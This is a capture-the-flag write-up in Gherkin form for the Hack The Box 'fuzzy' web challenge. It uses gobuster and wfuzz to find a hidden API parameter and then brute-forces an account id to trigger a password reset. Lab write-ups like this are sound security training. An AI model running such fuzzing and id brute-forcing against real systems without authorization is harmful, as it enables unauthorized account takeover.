## Version 2.0
## language: en

Feature: fuzzy-hackthebox
  Site:
    https://www.hackthebox.eu
  Category:
    web
  User:
    felipetic
  Goal:
    Find the flag on the given web

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali-Linux      | 2019.3      |
    | Firefox-Quantum | 60.8.0esr   |
    | Wfuzz           | 1.4d to 2.4 |
    | Gobuster        | 3.0.1       |

  Scenario: Fail:ctf
    Given the website, I look it
    """
    http://docker.hackthebox.eu:34828/api/action.php
    """
    When I got the following mistake result
    """
    Error parameter not set
    """
    And I needed to find the get parameter for that endpoint
    Then for this I decided use wfuzz, and I execute the following command
    """
    wfuzz --hh=24 -c -w /root/Escritorio/DirBuster/wordlists/big.txt
    http://docker.hackthebox.eu:34828/api/action.php?FUZZ=test
    """
    Then I got the following output
    """
    000015356 200 0l 5w 27 ch reset
    """
    And now I found the reset parameter
    Then I see what this parameter give in this url
    """
    http://docker.hackthebox.eu:34828/api/action.php?reset=
    """
    And I got the following output
    """
    Error account id not found
    """
    Then I had to apply brute force to the account id

  Scenario: Success:ctf
    Given the website, I open it
    """
    http://docker.hackthebox.eu:34828/
    """
    And I see this nice website
    Then I analyzed the source code
    And I decided to start, with another choice
    Then I start with the following basic gobuster command
    """
    gobuster dir -u http://docker.hackthebox.eu:34828/ -w /root/Escritorio/
    GoBuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm
    command explanation
    w wordlist
    t 50 threads
    x look for these extensions in the bruteforce
    """
    And I got the following output
    """
    index.html status 200
    css status 301
    js status 301
    api status 301
    """
    Then I got an interesting directory named api
    And I decided to execute the following command
    """
    gobuster dir -u http://docker.hackthebox.eu:42566/api/ -w /root/Escritorio/
    GoBuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm
    """
    And I got the following output
    """
    index.html status 200
    action.php status 200
    """
    Then I found the action.php file and I look at what it has inside
    """
    http://docker.hackthebox.eu:34828/api/action.php
    """
    And I got the following output
    """
    Error parameter not set
    """
    Then at that time I needed to find the get parameter for that endpoint
    And for this I decided use wfuzz, and I execute the following command
    """
    wfuzz --hh=24 -c -w /root/Escritorio/DirBuster/wordlists/big.txt
    http://docker.hackthebox.eu:34828/api/action.php?FUZZ=test
    command explanation
    hh filter the length of characters in source code
    c output with colors
    w wordlist
    fuzz fuzz keyword will be replaced by the word from the wordlist
    """
    Then I got the following output
    """
    000015356 200 0l 5w 27 ch reset
    """
    And now I found the reset parameter
    Then I see what this parameter give
    """
    http://docker.hackthebox.eu:34828/api/action.php?reset=
    """
    And I got an error output
    Then I had to apply brute force to the account id
    And I executed the following command with wfuzz
    """
    wfuzz --hh=27 -c -w /root/Escritorio/DirBuster/wordlists/big.txt
    http://docker.hackthebox.eu:34926/api/action.php?reset=FUZZ
    """
    Then I got the following output
    """
    000000053 200 0l 10w 74ch 20
    """
    And I got the account id 20
    Then I ended up using the url with the id
    """
    http://docker.hackthebox.eu:34926/api/action.php?reset=20
    """
    And I got the following output
    """
    You successfully reset your password please use HTB{flag} to login
    """
    And I solved the flag challenge
